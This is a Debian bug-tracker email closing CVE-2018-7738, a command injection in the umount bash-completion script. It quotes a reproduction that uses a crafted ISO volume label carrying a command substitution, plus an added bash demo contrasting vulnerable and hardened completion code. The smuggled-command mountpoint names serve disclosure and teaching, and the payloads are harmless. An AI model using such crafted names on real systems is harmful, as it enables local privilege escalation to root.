Your message dated Wed, 07 Mar 2018 16:36:44 +0000
with message-id <e1etc3y-0005zg...@fasolo.debian.org>
and subject line Bug#892179: fixed in util-linux 2.31.1-0.5
has caused the Debian Bug report #892179,
regarding util-linux: CVE-2018-7738: code execution in bash-completion for umount
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
892179: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892179
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: bash-completion
Version: 1:2.1-4.3
Severity: grave
Tags: security

Hi,

when bash-completion is installed, it uses
/usr/share/bash-completion/completions/umount from the umount package to
provide autocompletion. This script does not escape mount paths
correctly, so it allows a local user with rights to mount filesystems to
execute commands in the context of the umount user (probably root).
Unprivileged users can mount filesystems with custom mountpoints using
udisks2, FUSE or with the help of desktop environments.

Example:

as regular user:
------------------------------
$ mkdir empty

$ genisoimage -o test.iso -V '$(IFS=":";cmd="touch:foo";$cmd)' empty
I: -input-charset not specified, using utf-8 (detected in locale settings)
Total translation table size: 0
Total rockridge attributes bytes: 0
Total directory bytes: 0
Path table size(bytes): 10
Max brk space used 0
174 extents written (0 MB)

$ udisksctl loop-setup -f test.iso
Mapped file test.iso as /dev/loop0.

(if not mounted by automounter already)
$ udisksctl mount -b /dev/loop0
Mounted /dev/loop0 at /media/user/$(IFS=":";cmd="touch:foo";$cmd).
------------------------------

as different user or even root:
------------------------------
# ls -la
total 28
drwxr-xr-x  2 root root  4096 Feb 14 10:00 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..

# umount <TAB> ^C

# ls -la
total 28
drwxr-xr-x  2 root root  4096 Feb 14 10:01 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
-rw-r--r--  1 root root     0 Feb 14 10:01 foo
------------------------------

I tested it using the latest Debian GNU/Linux 9.3 (stretch) with a default
installation with desktop environment.
Involved packages:
mount 2.29.2-1
bash 4.4-5
bash-completion 1:2.1-4.3
genisoimage 9:1.1.11-3+b2
udisks2 2.1.8-1

uname -a
Linux id382 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02)
x86_64 GNU/Linux

It seems to be fixed in upstream util-linux already because of a similar
bugfix:
https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55#diff-a47601b5dbce9dc06c3af1deb02758c7

Björn Bosselmann
G DATA Software AG


-- System Information:
Debian Release: 9.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.9.0-6-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8),
LANGUAGE= (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages bash-completion depends on:
ii  bash  4.4-5
ii  dpkg  1.18.24

bash-completion recommends no packages.

bash-completion suggests no packages.

-- no debconf information

--- End Message ---
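The report above describes the defect in one sentence: the completion script hands unescaped mount paths to the shell for a second round of expansion. The following bash script is an added illustration, not the util-linux completion script and not code from the reporter. It models the unsafe pattern (feeding untrusted mountpoints to compgen -W, which IFS-splits and then shell-expands every word, command substitution included) next to a hardened completion that only prefix-matches the data and %q-quotes each candidate. The mount table, the function names, and the marker file path are all constructed for the demonstration; no real mount is created, and the crafted mountpoint's only effect is to create an empty marker file under $TMPDIR.

```shell
#!/usr/bin/env bash
# Added example for CVE-2018-7738; this is not the util-linux completion
# script, only a reduced model of the defect and of a hardened replacement.
# Bash-only (arrays, [[ ]], printf -v, process substitution), so re-exec
# under bash if started by a POSIX sh.
if [ -z "${BASH_VERSION:-}" ]; then exec bash "$0" "$@"; fi

# Constructed: a file that the crafted mountpoint below creates if the shell
# ever expands it. Its existence is the evidence that a command ran.
MARKER="${TMPDIR:-/tmp}/cve-2018-7738-demo.$$"
rm -f -- "$MARKER"

# Constructed mount targets, one per line, in the shape of `findmnt -lno TARGET`
# output. The third imitates a mountpoint named by an unprivileged user; it
# contains no spaces because IFS splitting would otherwise break the substitution.
sample_targets() {
    printf '%s\n' '/' '/boot/efi' "/media/user/\$(:>$MARKER)" '/mnt/with space'
}

# Vulnerable pattern: compgen -W splits its word list on IFS and then applies
# shell expansions, $(...) included, to every word. The crafted mountpoint is
# therefore executed in the shell of whoever presses <TAB>, typically root.
vulnerable_complete() {
    local cur=$1
    COMPREPLY=( $(compgen -W "$(sample_targets)" -- "$cur") )
}

# Hardened pattern: read the targets line by line, test the prefix with a
# pattern match (the data is never expanded), and quote each candidate with
# %q so that spaces and metacharacters reach the command line literally
# instead of being interpreted.
hardened_complete() {
    local cur=$1 target quoted
    COMPREPLY=()
    while IFS= read -r target; do
        [[ $target == "$cur"* ]] || continue
        printf -v quoted '%q' "$target"
        COMPREPLY+=("$quoted")
    done < <(sample_targets)
}

# Succeeds (exit 0) when the injected command ran, i.e. the marker exists.
injected_command_ran() { [ -e "$MARKER" ]; }

# Run both completions for the prefix "/m" and report whether the
# mountpoint's payload executed. The marker file is removed again afterwards.
demo() {
    local kind
    for kind in hardened vulnerable; do
        rm -f -- "$MARKER"
        "${kind}_complete" '/m'
        printf '%s: %d candidates, injected command ran: %s\n' "$kind" \
            "${#COMPREPLY[@]}" "$(injected_command_ran && echo yes || echo no)"
        printf '    %s\n' "${COMPREPLY[@]}"
    done
    rm -f -- "$MARKER"
}

demo
```

Running it shows the hardened completion returning `/mnt/with\ space` and a backslash-escaped form of the crafted name with the marker absent, while the vulnerable completion leaves the marker behind. The defensive lesson matches the Debian fix's description: enumerate mountpoints with findmnt, and never let the completion data pass through a second shell expansion; the %q quoting additionally keeps paths with spaces usable, which is the other half of the "escape a space in paths" change.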
--- Begin Message ---
Source: util-linux
Source-Version: 2.31.1-0.5

We believe that the bug you reported is fixed in the latest version of
util-linux, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 892...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <car...@debian.org> (supplier of updated util-linux package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Tue, 06 Mar 2018 22:31:39 +0100
Source: util-linux
Binary: util-linux util-linux-locales mount bsdutils fdisk fdisk-udeb libblkid1 libblkid1-udeb libblkid-dev libfdisk1 libfdisk1-udeb libfdisk-dev libmount1 libmount1-udeb libmount-dev libsmartcols1 libsmartcols1-udeb libsmartcols-dev libuuid1 uuid-runtime libuuid1-udeb uuid-dev util-linux-udeb setpriv rfkill
Architecture: source
Version: 2.31.1-0.5
Distribution: unstable
Urgency: medium
Maintainer: LaMont Jones <lam...@debian.org>
Changed-By: Salvatore Bonaccorso <car...@debian.org>
Closes: 745771 892179
Description: 
 bsdutils   - basic utilities from 4.4BSD-Lite
 fdisk      - collection of partitioning utilities
 fdisk-udeb - Manually partition a hard drive (fdisk) (udeb)
 libblkid-dev - block device ID library - headers and static libraries
 libblkid1  - block device ID library
 libblkid1-udeb - stripped down block device ID library, for debian-installer (udeb)
 libfdisk-dev - fdisk partitioning library - headers and static libraries
 libfdisk1  - fdisk partitioning library
 libfdisk1-udeb - stripped down fdisk partitioning library, for debian-installer (udeb)
 libmount-dev - device mounting library - headers and static libraries
 libmount1  - device mounting library
 libmount1-udeb - stripped down device mounting library, for debian-installer (udeb)
 libsmartcols-dev - smart column output alignment library - headers and static librar
 libsmartcols1 - smart column output alignment library
 libsmartcols1-udeb - stripped down smart column output alignment library, for debian-in (udeb)
 libuuid1   - Universally Unique ID library
 libuuid1-udeb - stripped down Universally Unique ID library, for debian-installer (udeb)
 mount      - tools for mounting and manipulating filesystems
 rfkill     - tool for enabling and disabling wireless devices
 setpriv    - tool to run a program with different Linux privilege settings
 util-linux - miscellaneous system utilities
 util-linux-locales - locales files for util-linux
 util-linux-udeb - stripped down miscellaneous system utilities, for debian-installe (udeb)
 uuid-dev   - Universally Unique ID library - headers and static libraries
 uuid-runtime - runtime components for the Universally Unique ID library
Changes:
 util-linux (2.31.1-0.5) unstable; urgency=medium
 .
   * Non-maintainer upload.
 .
   [ Laurent Bigonville ]
   * debian/rules: Enable SMACK support for libmount
   * Enable audit support (Closes: #745771)
 .
   [ Salvatore Bonaccorso ]
   * bash-completion: (umount) use findmnt, escape a space in paths.
     (CVE-2018-7738)
     Fixes "code execution in bash-completion for umount". (Closes: #892179)
Checksums-Sha1: 
 725360ea1dd6cafab53cd6cb47b820b6fe246db9 4181 util-linux_2.31.1-0.5.dsc
 af698313de08817f24fbf6b899105946a429da76 87512 util-linux_2.31.1-0.5.debian.tar.xz
Checksums-Sha256: 
 d67c1bc851f0dd5028387671940b5904fabad2cb24e98eeb4a755fce7e82d317 4181 util-linux_2.31.1-0.5.dsc
 a0b049065431f8c9455fbe7276b8ca7cdf020cff0329cd1f050ee1fb380432ee 87512 util-linux_2.31.1-0.5.debian.tar.xz
Files: 
 4f132982232dd39c252f03175e19a6c3 4181 base required util-linux_2.31.1-0.5.dsc
 9a16b5741bd41c3938586e1c123fab04 87512 base required util-linux_2.31.1-0.5.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

--- End Message ---